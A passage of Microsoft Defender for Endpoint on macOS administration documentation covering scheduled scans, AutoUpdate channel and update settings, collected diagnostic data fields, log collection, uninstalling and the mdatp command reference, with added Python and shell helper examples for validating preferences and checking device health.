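                raise ValueError("interval must be 0 (never) or between 1 and 24 hours")
            daily["interval"] = str(hourly_interval)  # Example 2 stores it as <string>
        scan["dailyConfiguration"] = daily
    if weekly_day is not None:
        if weekly_scan_type not in ("quick", "full"):
            raise ValueError("scanType must be quick or full")
        if weekly_time is None:
            raise ValueError("weekly scans need a time of day")
        scan["weeklyConfiguration"] = {
            "dayOfWeek": DAYS[weekly_day.lower()],
            "timeOfDay": minutes_after_midnight(weekly_time),
            "scanType": weekly_scan_type,
        }
    return {"features": {"scheduledScan": "enabled"}, "scheduledScan": scan}


def to_plist(config):
    """XML plist bytes, ready to be saved as com.microsoft.wdav.plist."""
    return plistlib.dumps(config, fmt=plistlib.FMT_XML)


def parse_plist(data):
    """Inverse of to_plist, used to verify a generated file round-trips."""
    return plistlib.loads(data)


if __name__ == "__main__":
    # Reproduces Example 1: daily quick scan at 14:45, weekly full scan on Wednesday at 14:40.
    example1 = scheduled_scan_config(daily_time="14:45", weekly_day="Wednesday",
                                     weekly_time="14:40", weekly_scan_type="full",
                                     ignore_exclusions=True, low_priority=True)
    print(to_plist(example1).decode())
```

The generated XML is equivalent to Example 1; the only differences are plistlib's indentation and key order, which the plist format does not care about.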

Option 3: Configure scheduled scans through CLI tool

To enable the scheduled scan feature (version 101.23122.* or higher):

sudo mdatp config scheduled-scan settings feature --value enabled

To schedule hourly quick scans (version 101.23122.* or higher):

sudo mdatp config scheduled-scan quick-scan hourly-interval --value <arg>

To schedule daily quick scans (version 101.23122.* or higher):

sudo mdatp config scheduled-scan quick-scan time-of-day --value <arg>

To schedule weekly scans (version 101.23122.* or higher):

sudo mdatp config scheduled-scan weekly-scan --day-of-week <arg> --time-of-day <arg> --scan-type <arg>

For other configuration options:

To check for definitions update before scheduled scans:

sudo mdatp config scheduled-scan settings check-for-definitions --value true

To use low priority threads for scheduled scanning:

sudo mdatp config scheduled-scan settings low-priority --value true

Check that the scheduled scan ran

Use the following command:

mdatp scan list

<snip>

Important

Scheduled scans will not run at the scheduled time while the device is asleep. They
will instead run once the device resumes from sleep mode. If the device is turned
off, the scan will run at the next scheduled scan time.



Deploy updates for Microsoft Defender
for Endpoint on macOS
Article • 10/12/2023

Applies to:

Microsoft Defender for Endpoint on macOS


Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Microsoft regularly publishes software updates to improve performance, security, and to
deliver new features.

Warning

Each version of Defender for Endpoint on macOS is set to expire automatically after
6 months. While expired versions continue to receive security intelligence updates,
we recommend that you install the latest version to get all available improvements
and enhancements.
To check the expiration date, run the following command:

Bash

mdatp health --field product_expiration

To update Microsoft Defender for Endpoint on macOS, a program named Microsoft
AutoUpdate (MAU) is used. MAU checks for updates periodically, and automatically
downloads and installs them.

You can deploy preferences to configure how and when MAU checks for updates for the
Macs in your organization.

Use msupdate
MAU includes a command-line tool, called msupdate, that is designed for IT
administrators so that they have more precise control over when updates are applied.
Instructions for how to use this tool can be found in Update Office for Mac by using
msupdate.

In MAU, the application identifier for Microsoft Defender for Endpoint on macOS is
WDAV00. To download and install the latest updates for Microsoft Defender for
Endpoint on macOS, execute the following command from a Terminal window:

Bash

cd /Library/Application\ Support/Microsoft/MAU2.0/Microsoft\ AutoUpdate.app/Contents/MacOS
./msupdate --install --apps wdav00

Set preferences for Microsoft AutoUpdate

This section describes the most common preferences that can be used to configure
MAU. These settings can be deployed as a configuration profile through the
management console that your enterprise is using. An example of a configuration
profile is shown in the following sections.

Set the channel name

The channel determines the type and frequency of updates that are offered through
MAU. Devices in Beta can try out new features before devices in Preview and Current.

The Current channel contains the most stable version of the product.

Important

Prior to Microsoft AutoUpdate version 4.29, channels had different names:

- Beta Channel was named InsiderFast (Insider Fast)
- Current Channel (Preview) was named External (Insider Slow)
- Current Channel was named Production

Tip

In order to preview new features and provide early feedback, it is recommended
that you configure some devices in your enterprise to Beta or Preview.

Section | Value
Domain | com.microsoft.autoupdate2
Key | ChannelName
Data type | String
Possible values | Beta, Preview, Current

Warning

This setting changes the channel for all applications that are updated through
Microsoft AutoUpdate. To change the channel only for Microsoft Defender for
Endpoint on macOS, execute the following command after replacing [channel-name]
with the desired channel:

Bash

defaults write com.microsoft.autoupdate2 Applications -dict-add "/Applications/Microsoft Defender.app" " { 'Application ID' = 'WDAV00' ; 'App Domain' = 'com.microsoft.wdav' ; LCID = 1033 ; ChannelName = '[channel-name]' ; }"

Set update check frequency

Change how often MAU searches for updates.

Section | Value
Domain | com.microsoft.autoupdate2
Key | UpdateCheckFrequency
Data type | Integer
Default value | 720 (minutes)
Comment | This value is set in minutes. The allowed range is 240 minutes (4 hours) - 720 minutes (12 hours).
Change how MAU interacts with updates

Change how MAU searches for updates.

Section | Value
Domain | com.microsoft.autoupdate2
Key | HowToCheck
Data type | String
Possible values | Manual, AutomaticCheck, AutomaticDownload
Comment | Note that AutomaticDownload will download and install silently if possible.

Change whether the "Check for Updates" button is enabled

Change whether local users are able to click the "Check for Updates" option in the
Microsoft AutoUpdate user interface.

Section | Value
Domain | com.microsoft.autoupdate2
Key | EnableCheckForUpdatesButton
Data type | Boolean
Possible values | True (default), False

Disable Insider checkbox

Set to true to make the "Join the Office Insider Program..." checkbox unavailable /
greyed out to users.

Section | Value
Domain | com.microsoft.autoupdate2
Key | DisableInsiderCheckbox
Data type | Boolean
Possible values | False (default), True
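Before pushing a com.microsoft.autoupdate2 profile fleet-wide, it is worth checking it against the constraints in the tables above. The following added example (written for this article, not Microsoft's code) does that: it translates the pre-4.29 channel names to the current ones, rejects an UpdateCheckFrequency outside 240-720 minutes or an unknown HowToCheck value, and serialises the result with plistlib. The function names and the two constructed preference sets are this example's own; any key the tables do not cover is passed through unchanged.

```python
"""Added example (not Microsoft's code): check Microsoft AutoUpdate preferences
against the constraints documented in this article and emit them as a plist."""
import plistlib

# Channel names before MAU 4.29 mapped to the names used today.
LEGACY_CHANNEL_NAMES = {"InsiderFast": "Beta", "External": "Preview", "Production": "Current"}
CHANNELS = ("Beta", "Preview", "Current")
HOW_TO_CHECK = ("Manual", "AutomaticCheck", "AutomaticDownload")
MIN_FREQ, MAX_FREQ = 240, 720        # UpdateCheckFrequency range, in minutes


def check_mau_prefs(prefs):
    """Return (normalised prefs, problems). Only the keys described in this
    article are checked; other keys are passed through untouched."""
    out, problems = dict(prefs), []
    channel = out.get("ChannelName")
    if channel in LEGACY_CHANNEL_NAMES:
        out["ChannelName"] = LEGACY_CHANNEL_NAMES[channel]   # e.g. InsiderFast -> Beta
    elif channel is not None and channel not in CHANNELS:
        problems.append(f"ChannelName {channel!r} must be one of {', '.join(CHANNELS)}")
    freq = out.get("UpdateCheckFrequency")
    if freq is not None and not (isinstance(freq, int) and not isinstance(freq, bool)
                                 and MIN_FREQ <= freq <= MAX_FREQ):
        problems.append(f"UpdateCheckFrequency {freq!r} must be an integer between "
                        f"{MIN_FREQ} and {MAX_FREQ} minutes")
    how = out.get("HowToCheck")
    if how is not None and how not in HOW_TO_CHECK:
        problems.append(f"HowToCheck {how!r} must be one of {', '.join(HOW_TO_CHECK)}")
    for key in ("EnableCheckForUpdatesButton", "DisableInsiderCheckbox"):
        if key in out and not isinstance(out[key], bool):
            problems.append(f"{key} must be a boolean")
    return out, problems


def to_profile(prefs):
    """XML plist bytes for the com.microsoft.autoupdate2 preference domain.
    Raises ValueError if the preferences violate a documented constraint."""
    normalised, problems = check_mau_prefs(prefs)
    if problems:
        raise ValueError("; ".join(problems))
    return plistlib.dumps(normalised, fmt=plistlib.FMT_XML)


def load_profile(data):
    """Inverse of to_profile, used to verify a generated profile round-trips."""
    return plistlib.loads(data)


# Constructed inputs: a profile written with pre-4.29 names, an out-of-range check
# frequency, a misspelled HowToCheck and a non-boolean flag ...
WEAK_PREFS = {"ChannelName": "InsiderFast", "HowToCheck": "Automatic",
              "UpdateCheckFrequency": 60, "EnableCheckForUpdatesButton": "yes"}
# ... and the corrected version, matching the example profile later in this article.
GOOD_PREFS = {"ChannelName": "Current", "HowToCheck": "AutomaticDownload",
              "EnableCheckForUpdatesButton": True, "DisableInsiderCheckbox": False}


if __name__ == "__main__":
    normalised, problems = check_mau_prefs(WEAK_PREFS)
    print("weak profile ->", normalised["ChannelName"], "| problems:", problems)
    print(to_profile(GOOD_PREFS).decode())
```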

Example configuration profile

The following configuration profile is used to:

- Place the device in the Current channel
- Automatically download and install updates
- Enable the "Check for updates" button in the user interface
- Allow users on the device to enroll into the Insider channels

Warning

The below configuration is an example configuration and should not be used in
production without proper review of settings and tailoring of configurations.

Jamf Pro

XML

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>ChannelName</key>
<string>Current</string>
<key>HowToCheck</key>
<string>AutomaticDownload</string>
<key>EnableCheckForUpdatesButton</key>
<true/>
<key>DisableInsiderCheckbox</key>
<false/>
</dict>
</plist>

Intune

XML

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1">
<dict>
<key>PayloadUUID</key>
<string>B762FF60-6ACB-4A72-9E72-459D00C936F3</string>
<key>PayloadType</key>
<string>Configuration</string>
<key>PayloadOrganization</key>
<string>Microsoft</string>
<key>PayloadIdentifier</key>
<string>com.microsoft.autoupdate2</string>
<key>PayloadDisplayName</key>
<string>Microsoft AutoUpdate settings</string>
<key>PayloadDescription</key>
<string>Microsoft AutoUpdate configuration settings</string>
<key>PayloadVersion</key>
<integer>1</integer>
<key>PayloadEnabled</key>
<true/>
<key>PayloadRemovalDisallowed</key>
<true/>
<key>PayloadScope</key>
<string>System</string>
<key>PayloadContent</key>
<array>
<dict>
<key>PayloadUUID</key>
<string>5A6F350A-CC2C-440B-A074-68E3F34EBAE9</string>
<key>PayloadType</key>
<string>com.microsoft.autoupdate2</string>
<key>PayloadOrganization</key>
<string>Microsoft</string>
<key>PayloadIdentifier</key>
<string>com.microsoft.autoupdate2</string>
<key>PayloadDisplayName</key>
<string>Microsoft AutoUpdate configuration settings</string>
<key>PayloadDescription</key>
<string/>
<key>PayloadVersion</key>
<integer>1</integer>
<key>PayloadEnabled</key>
<true/>
<key>ChannelName</key>
<string>Current</string>
<key>HowToCheck</key>
<string>AutomaticDownload</string>
<key>EnableCheckForUpdatesButton</key>
<true/>
<key>DisableInsiderCheckbox</key>
<false/>
</dict>
</array>
</dict>
</plist>

To configure MAU, you can deploy this configuration profile from the management tool
that your enterprise is using:

From Jamf Pro, upload this configuration profile and set the Preference Domain to
com.microsoft.autoupdate2.
From Intune, upload this configuration profile and set the custom configuration
profile name to com.microsoft.autoupdate2.

Resources
msupdate reference

 Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community .


Privacy for Microsoft Defender for Endpoint on macOS
Article • 02/07/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Microsoft is committed to providing you with the information and controls you need to
make choices about how your data is collected and used when you're using Microsoft
Defender for Endpoint on macOS.

This topic describes the privacy controls available within the product, how to manage
these controls with policy settings and more details on the data events that are
collected.

Overview of privacy controls in Microsoft Defender for Endpoint on macOS

This section describes the privacy controls for the different types of data collected by
Microsoft Defender for Endpoint on macOS.

Diagnostic data
Diagnostic data is used to keep Microsoft Defender for Endpoint secure and up to date,
detect, diagnose and fix problems, and also make product improvements.

Some diagnostic data is required, while some diagnostic data is optional. We give you
the ability to choose whether to send us required or optional diagnostic data through
the use of privacy controls, such as policy settings for organizations.

There are two levels of diagnostic data for Microsoft Defender for Endpoint client
software that you can choose from:

Required: The minimum data necessary to help keep Microsoft Defender for
Endpoint secure, up to date, and performing as expected on the device it's
installed on.

Optional: Additional data that helps Microsoft make product improvements and
provides enhanced information to help detect, diagnose, and remediate issues.

By default, only required diagnostic data is sent to Microsoft.

Cloud delivered protection data

Cloud delivered protection is used to provide increased and faster protection with
access to the latest protection data in the cloud.

Enabling the cloud-delivered protection service is optional; however, it's highly
recommended because it provides important protection against malware on your
endpoints and across your network.

Sample data
Sample data is used to improve the protection capabilities of the product, by sending
Microsoft suspicious samples so they can be analyzed. Enabling automatic sample
submission is optional.

When this feature is enabled and the sample that is collected is likely to contain
personal information, the user is prompted for consent.

Manage privacy controls with policy settings

If you're an IT administrator, you might want to configure these controls at the
enterprise level.

The privacy controls for the various types of data described in the preceding section are
described in detail in Set preferences for Microsoft Defender for Endpoint on macOS.

As with any new policy settings, you should carefully test them out in a limited,
controlled environment to ensure the settings that you configure have the desired effect
before you implement the policy settings more widely in your organization.

Diagnostic data events

This section describes what is considered required diagnostic data and what is
considered optional diagnostic data, along with a description of the events and fields
that are collected.

Data fields that are common for all events

There's some information about events that is common to all events, regardless of
category or data subtype.

The following fields are considered common for all events:

platform: The broad classification of the platform on which the app is running.
Allows Microsoft to identify on which platforms an issue may be occurring so that
it can correctly be prioritized.

machine_guid: Unique identifier associated with the device. Allows Microsoft to
identify whether issues are impacting a select set of installs and how many users
are impacted.

sense_guid: Unique identifier associated with the device. Allows Microsoft to
identify whether issues are impacting a select set of installs and how many users
are impacted.

org_id: Unique identifier associated with the enterprise that the device belongs
to. Allows Microsoft to identify whether issues are impacting a select set of
enterprises and how many enterprises are impacted.

hostname: Local device name (without DNS suffix). Allows Microsoft to identify
whether issues are impacting a select set of installs and how many users are
impacted.

product_guid: Unique identifier of the product. Allows Microsoft to differentiate
issues impacting different flavors of the product.

app_version: Version of the Microsoft Defender for Endpoint on macOS application.
Allows Microsoft to identify which versions of the product are showing an issue
so that it can correctly be prioritized.

sig_version: Version of the security intelligence database. Allows Microsoft to
identify which versions of the security intelligence are showing an issue so that
it can correctly be prioritized.

supported_compressions: List of compression algorithms supported by the
application, for example ['gzip']. Allows Microsoft to understand what types of
compression can be used when it communicates with the application.

release_ring: Ring that the device is associated with (for example Insider Fast,
Insider Slow, Production). Allows Microsoft to identify on which release ring an
issue may be occurring so that it can correctly be prioritized.

Required diagnostic data

Required diagnostic data is the minimum data necessary to help keep Microsoft
Defender for Endpoint secure, up to date, and perform as expected on the device it's
installed on.

Required diagnostic data helps to identify problems with Microsoft Defender for
Endpoint that may be related to a device or software configuration. For example, it can
help determine if a Microsoft Defender for Endpoint feature crashes more frequently on
a particular operating system version, with newly introduced features, or when certain
Microsoft Defender for Endpoint features are disabled. Required diagnostic data helps
Microsoft detect, diagnose, and fix these problems more quickly so the impact to users
or organizations is reduced.

Software setup and inventory data events

Microsoft Defender for Endpoint installation / uninstallation:

The following fields are collected:

correlation_id: Unique identifier associated with the installation.

version: Version of the package.

severity: Severity of the message (for example Informational).

code: Code that describes the operation.

text: Additional information associated with the product installation.

Microsoft Defender for Endpoint configuration:

The following fields are collected:

antivirus_engine.enable_real_time_protection: Whether real-time protection is
enabled on the device or not.

antivirus_engine.passive_mode: Whether passive mode is enabled on the device or not.

cloud_service.enabled: Whether cloud delivered protection is enabled on the device
or not.

cloud_service.timeout: Time out when the application communicates with the
Microsoft Defender for Endpoint cloud.

cloud_service.heartbeat_interval: Interval between consecutive heartbeats sent by
the product to the cloud.

cloud_service.service_uri: URI used to communicate with the cloud.

cloud_service.diagnostic_level: Diagnostic level of the device (required, optional).

cloud_service.automatic_sample_submission: Whether automatic sample submission is
turned on or not.

cloud_service.automatic_definition_update_enabled: Whether automatic definition
update is turned on or not.

edr.early_preview: Whether the device should run EDR early preview features.

edr.group_id: Group identifier used by the detection and response component.

edr.tags: User-defined tags.

features.[optional feature name]: List of preview features, along with whether
they're enabled or not.

Product and service usage data events

Security intelligence update report:

The following fields are collected:

from_version: Original security intelligence version.

to_version: New security intelligence version.

status: Status of the update indicating success or failure.

using_proxy: Whether the update was done over a proxy.

error: Error code if the update failed.

reason: Error message if the update failed.

Product and service performance data events for required diagnostic data

Unexpected application exit (crash):

Collects system information and the state of an application when an application
unexpectedly exits.

The following fields are collected:

v1_crash_count: Number of times the V1 engine process crashed every hour on the client machine.

v2_crash_count: Number of times the V2 engine process crashed every hour on the client machine.

EDR_crash_count: Number of times the EDR process crashed every hour on the client machine.

Kernel extension statistics:

The following fields are collected:

version: Version of Microsoft Defender for Endpoint on macOS.

instance_id: Unique identifier generated on kernel extension startup.

trace_level: Trace level of the kernel extension.

subsystem: The underlying subsystem used for real-time protection.

ipc.connects: Number of connection requests received by the kernel extension.

ipc.rejects: Number of connection requests rejected by the kernel extension.

ipc.connected: Whether there's any active connection to the kernel extension.

Support data

Diagnostic logs:

Diagnostic logs are collected only with the consent of the user as part of the feedback
submission feature. The following files are collected as part of the support logs:

All files under /Library/Logs/Microsoft/mdatp/
Subset of files under /Library/Application Support/Microsoft/Defender/ that are
created and used by Microsoft Defender for Endpoint on macOS
Subset of files under /Library/Managed Preferences that are used by Microsoft
Defender for Endpoint on macOS
/Library/Logs/Microsoft/autoupdate.log
$HOME/Library/Preferences/com.microsoft.autoupdate2.plist

Optional diagnostic data

Optional diagnostic data is additional data that helps Microsoft make product
improvements and provides enhanced information to help detect, diagnose, and fix
issues.

If you choose to send us optional diagnostic data, required diagnostic data is also
included.

Examples of optional diagnostic data include data Microsoft collects about product
configuration (for example the number of exclusions set on the device) and product
performance (aggregate measures about the performance of components of the
product).

Software setup and inventory data events for optional diagnostic data

Microsoft Defender for Endpoint configuration:

The following fields are collected:

connection_retry_timeout: Connection retry time out when communicating with the cloud.

file_hash_cache_maximum: Size of the product cache.

crash_upload_daily_limit: Limit of crash logs uploaded daily.

antivirus_engine.exclusions[].is_directory: Whether the exclusion from scanning is
a directory or not.

antivirus_engine.exclusions[].path: Path that was excluded from scanning.

antivirus_engine.exclusions[].extension: Extension excluded from scanning.

antivirus_engine.exclusions[].name: Name of the file excluded from scanning.

antivirus_engine.scan_cache_maximum: Size of the product cache.

antivirus_engine.maximum_scan_threads: Maximum number of threads used for scanning.

antivirus_engine.threat_restoration_exclusion_time: Time out before a file restored
from the quarantine can be detected again.

antivirus_engine.threat_type_settings: Configuration for how different threat types
are handled by the product.

filesystem_scanner.full_scan_directory: Full scan directory.

filesystem_scanner.quick_scan_directories: List of directories used in quick scan.

edr.latency_mode: Latency mode used by the detection and response component.

edr.proxy_address: Proxy address used by the detection and response component.

Microsoft Auto-Update configuration:

The following fields are collected:

how_to_check: Determines how product updates are checked (for example automatic or
manual).

channel_name: Update channel associated with the device.

manifest_server: Server used for downloading updates.

update_cache: Location of the cache used to store updates.

Product and service usage

Diagnostic log upload started report

The following fields are collected:

sha256: SHA256 identifier of the support log.

size: Size of the support log.

original_path: Path to the support log (always under
/Library/Application Support/Microsoft/Defender/wdavdiag/).

format: Format of the support log.

metadata: Information about the content of the support log.

Diagnostic log upload completed report

The following fields are collected:

request_id: Correlation ID for the support log upload request.

sha256: SHA256 identifier of the support log.

blob_sas_uri: URI used by the application to upload the support log.

Product and service performance data events for product and service usage

Unexpected application exit (crash):

Unexpected application exits and the state of the application when that happens.

Kernel extension statistics:

The following fields are collected. All of them are aggregated numerical values,
representing the count of events that happened since kernel extension startup:

pkt_ack_timeout
pkt_ack_conn_timeout
ipc.ack_pkts
ipc.nack_pkts
ipc.send.ack_no_conn
ipc.send.nack_no_conn
ipc.send.ack_no_qsq
ipc.send.nack_no_qsq
ipc.ack.no_space
ipc.ack.timeout
ipc.ack.ackd_fast
ipc.ack.ackd
ipc.recv.bad_pkt_len
ipc.recv.bad_reply_len
ipc.recv.no_waiter
ipc.recv.copy_failed
ipc.kauth.vnode.mask
ipc.kauth.vnode.read
ipc.kauth.vnode.write
ipc.kauth.vnode.exec
ipc.kauth.vnode.del
ipc.kauth.vnode.read_attr
ipc.kauth.vnode.write_attr
ipc.kauth.vnode.read_ex_attr
ipc.kauth.vnode.write_ex_attr
ipc.kauth.vnode.read_sec
ipc.kauth.vnode.write_sec
ipc.kauth.vnode.take_own
ipc.kauth.vnode.link
ipc.kauth.vnode.create
ipc.kauth.vnode.move
ipc.kauth.vnode.mount
ipc.kauth.vnode.denied
ipc.kauth.vnode.ackd_before_deadline
ipc.kauth.vnode.missed_deadline
ipc.kauth.file_op.mask
ipc.kauth_file_op.open
ipc.kauth.file_op.close
ipc.kauth.file_op.close_modified
ipc.kauth.file_op.move
ipc.kauth.file_op.link
ipc.kauth.file_op.exec
ipc.kauth.file_op.remove
ipc.kauth.file_op.unmount
ipc.kauth.file_op.fork
ipc.kauth.file_op.create

Resources
Privacy at Microsoft

Resources for Microsoft Defender for Endpoint on macOS
Article • 02/26/2024

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Collecting diagnostic information

If you can reproduce a problem, increase the logging level, run the system for some
time, and restore the logging level to the default.

1. Increase logging level:

Bash

mdatp log level set --level debug

Output

Log level configured successfully

2. Reproduce the problem

3. Run sudo mdatp diagnostic create to back up the Microsoft Defender for
Endpoint logs. The files will be stored inside a .zip archive. This command will also
print out the file path to the backup after the operation succeeds.

Tip

By default, diagnostic logs are saved to
/Library/Application Support/Microsoft/Defender/wdavdiag/. To change the directory
where diagnostic logs are saved, pass --path [directory] to the below command,
replacing [directory] with the desired directory.

Bash

sudo mdatp diagnostic create

Console

Diagnostic file created: "/Library/Application Support/Microsoft/Defender/wdavdiag/932e68a8-8f2e-4ad0-a7f2-65eb97c0de01.zip"

4. Restore logging level:

Bash

mdatp log level set --level info

Console

Log level configured successfully
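The four steps above as one script, added here as an example and not taken from the Microsoft page: an EXIT trap puts the log level back to info even when the reproduction or the diagnostic run fails, so verbose logging is never left enabled on the device, and extract_diag_path pulls the archive path out of the "Diagnostic file created" line for hand-off to support. The repro wait time, the optional output directory argument and the function names are my own choices.

```shell
#!/bin/bash
# Added example, not part of the Microsoft page: the four-step diagnostic
# procedure as one script. The EXIT trap restores the default log level
# even if reproducing the problem or creating the archive fails, so debug
# logging (which is chattier and costs disk) is never left running.
set -u

# Pull the archive path out of the 'Diagnostic file created: "..."' line
# that "mdatp diagnostic create" prints. Prints nothing and returns 1 when
# no such line is present in the given output.
extract_diag_path() {
    printf '%s\n' "$1" \
        | sed -n 's/^Diagnostic file created: "\(.*\)"[[:space:]]*$/\1/p' \
        | grep .
}

# $1: seconds to keep debug logging on while the problem is reproduced
#     (an assumed parameter; the page leaves the duration to the operator)
# $2: optional directory for the archive, passed through as --path
collect_diagnostics() {
    local repro_seconds="$1" outdir="${2:-}" output archive

    # Step 4 of the procedure, guaranteed to run on every exit path.
    trap 'mdatp log level set --level info' EXIT

    # Step 1: raise the log level.
    mdatp log level set --level debug || return 1

    # Step 2: give the operator time to reproduce the problem.
    echo "Debug logging is on; reproduce the problem within ${repro_seconds}s." >&2
    sleep "$repro_seconds"

    # Step 3: create the archive in the default or the chosen directory.
    if [ -n "$outdir" ]; then
        output="$(sudo mdatp diagnostic create --path "$outdir")"
    else
        output="$(sudo mdatp diagnostic create)"
    fi
    archive="$(extract_diag_path "$output")" || {
        echo "mdatp did not report an archive path: $output" >&2
        return 1
    }
    echo "$archive"
}

# Invoke as: ./collect.sh run [repro-seconds] [output-dir]
# Without "run" the script only defines the functions.
case "${1:-}" in
    run) collect_diagnostics "${2:-120}" "${3:-}" ;;
esac
```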

Logging installation issues

If an error occurs during installation, the installer will only report a general failure.

The detailed log will be saved to /Library/Logs/Microsoft/mdatp/install.log. If you
experience issues during installation, send us this file so we can help diagnose the cause.
For further troubleshooting of installation issues, review Troubleshoot installation
issues for Microsoft Defender for Endpoint on macOS.

Uninstalling

Note

Before uninstalling Microsoft Defender for Endpoint on macOS, please offboard per
Offboard non-Windows devices.

There are several ways to uninstall Microsoft Defender for Endpoint on macOS. Note
that while centrally managed uninstall is available on JAMF, it is not yet available for
Microsoft Intune.

Interactive uninstallation

Open Finder > Applications. Right click on Microsoft Defender for Endpoint >
Move to Trash.

Supported output types

Supports table and JSON format output types. For each command, there's a default
output behavior. You can modify the output in your preferred output format using the
following options:

--output json

--output table

From the command line

sudo '/Library/Application Support/Microsoft/Defender/uninstall/uninstall'

Using JAMF Pro

To uninstall Microsoft Defender for Endpoint on macOS using JAMF Pro, upload the
offboarding profile.

The offboarding profile should be uploaded without any modifications, and with
Preference Domain name set to com.microsoft.wdav.atp.offboarding:


Configuring from the command line

Important tasks, such as controlling product settings and triggering on-demand scans,
can be done from the command line. Each entry below gives the group, the scenario and
the command:

Configuration | Turn on/off antivirus passive mode
    mdatp config passive-mode --value [enabled/disabled]

Configuration | Turn on/off real-time protection
    mdatp config real-time-protection --value [enabled/disabled]

Configuration | Turn on/off cloud protection
    mdatp config cloud --value [enabled/disabled]

Configuration | Turn on/off product diagnostics
    mdatp config cloud-diagnostic --value [enabled/disabled]

Configuration | Turn on/off automatic sample submission
    mdatp config cloud-automatic-sample-submission --value [enabled/disabled]

Configuration | Turn on/audit/off PUA protection
    mdatp threat policy set --type potentially_unwanted_application --action [block/audit/off]

Configuration | Add/remove an antivirus exclusion for a process
    mdatp exclusion process [add/remove] --path [path-to-process]
    or mdatp exclusion process [add/remove] --name [process-name]

Configuration | Add/remove an antivirus exclusion for a file
    mdatp exclusion file [add/remove] --path [path-to-file]

Configuration | Add/remove an antivirus exclusion for a directory
    mdatp exclusion folder [add/remove] --path [path-to-directory]

Configuration | Add/remove an antivirus exclusion for a file extension
    mdatp exclusion extension [add/remove] --name [extension]

Configuration | List all antivirus exclusions
    mdatp exclusion list

Configuration | Configure degree of parallelism for on-demand scans
    mdatp config maximum-on-demand-scan-threads --value [numerical-value-between-1-and-64]

Configuration | Turn on/off scans after security intelligence updates
    mdatp config scan-after-definition-update --value [enabled/disabled]

Configuration | Turn on/off archive scanning (on-demand scans only)
    mdatp config scan-archives --value [enabled/disabled]

Configuration | Turn on/off file hash computation
    mdatp config enable-file-hash-computation --value [enabled/disabled]

Protection | Scan a path
    mdatp scan custom --path [path] [--ignore-exclusions]

Protection | Do a quick scan
    mdatp scan quick

Protection | Do a full scan
    mdatp scan full

Protection | Cancel an ongoing on-demand scan
    mdatp scan cancel

Protection | Request a security intelligence update
    mdatp definitions update

Configuration | Add a threat name to the allowed list
    mdatp threat allowed add --name [threat-name]

Configuration | Remove a threat name from the allowed list
    mdatp threat allowed remove --name [threat-name]

Configuration | List all allowed threat names
    mdatp threat allowed list

Protection | Print the full protection history
    mdatp threat list

Protection | Get threat details
    mdatp threat get --id [threat-id]

Quarantine management | List all quarantined files
    mdatp threat quarantine list

Quarantine management | Remove all files from the quarantine
    mdatp threat quarantine remove-all

Quarantine management | Add a file detected as a threat to the quarantine
    mdatp threat quarantine add --id [threat-id]

Quarantine management | Remove a file detected as a threat from the quarantine
    mdatp threat quarantine remove --id [threat-id]

Quarantine management | Restore a file from the quarantine. Available in Defender for
Endpoint versions lower than 101.23092.0012.
    mdatp threat quarantine restore --id [threat-id] --path [destination-folder]

Quarantine management | Restore a file from the quarantine with Threat ID. Available in
Defender for Endpoint version 101.23092.0012 or higher.
    mdatp threat restore threat-id --id [threat-id] --destination-path [destination-folder]

Quarantine management | Restore a file from the quarantine with Threat Original Path.
Available in Defender for Endpoint version 101.23092.0012 or higher.
    mdatp threat restore threat-path --path [threat-original-path] --destination-path [destination-folder]

Network Protection Configuration | Configure the Network Protection enforcement level
    mdatp config network-protection enforcement-level --value [Block/Audit/Disabled]

Network Protection management | Check Network protection has been started successfully
    mdatp health --field network_protection_status

Device Control management | Is Device Control enabled, and what is the Default Enforcement?
    mdatp device-control policy preferences list

Device Control management | What Device Control policy is enabled?
    mdatp device-control policy rules list

Device Control management | What Device Control policy groups are enabled?
    mdatp device-control policy groups list

Configuration | Turn on/off data loss prevention
    mdatp config data_loss_prevention --value [enabled/disabled]

Diagnostics | Change the log level
    mdatp log level set --level [error/warning/info/verbose]

Diagnostics | Generate diagnostic logs
    mdatp diagnostic create --path [directory]

Health | Check the product's health
    mdatp health

Health | Check for a specific product attribute
    mdatp health --field [attribute: healthy/licensed/engine_version...]

EDR | EDR list exclusions (root)
    mdatp edr exclusion list [processes|paths|extensions|all]

EDR | Set/Remove tag, only GROUP supported
    mdatp edr tag set --name GROUP --value [name]

EDR | Remove group tag from device
    mdatp edr tag remove --tag-name [name]

EDR | Add Group ID
    mdatp edr group-ids --group-id [group]
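An added check, not from the Microsoft page, that uses the mdatp health --field form listed above to compare a device against the protection baseline an administrator would expect (real-time protection on, cloud protection on, passive mode off, definitions current) and reports every deviation; the MDATP variable lets the same logic be pointed at a stand-in command where the product is not installed. Attribute names other than healthy, licensed and network_protection_status, and the baseline values, are assumptions drawn from mdatp health output rather than from this page.

```shell
#!/bin/bash
# Added example, not part of the Microsoft page: compare a device's live
# "mdatp health --field <attribute>" answers against the protection
# baseline an administrator expects on a managed Mac. MDATP can be
# pointed at a stand-in command to exercise the logic without the product.
MDATP="${MDATP:-mdatp}"

# Expected values, one "attribute=value" per line. Attribute names other
# than healthy and licensed are assumed from the product's health output.
BASELINE="healthy=true
licensed=true
real_time_protection_enabled=true
cloud_enabled=true
passive_mode_enabled=false
automatic_definition_update_enabled=true
definitions_status=up_to_date
tamper_protection=block"

# Query a single health attribute. mdatp prints string values in double
# quotes; strip them (and any whitespace) so comparisons are plain text.
health_field() {
    "$MDATP" health --field "$1" 2>/dev/null | tr -d '"[:space:]'
}

# Walk the baseline, print one line per deviation, return 1 if any deviate.
audit_health() {
    local rc=0 line attr want got
    while IFS= read -r line; do
        [ -n "$line" ] || continue
        attr="${line%%=*}"
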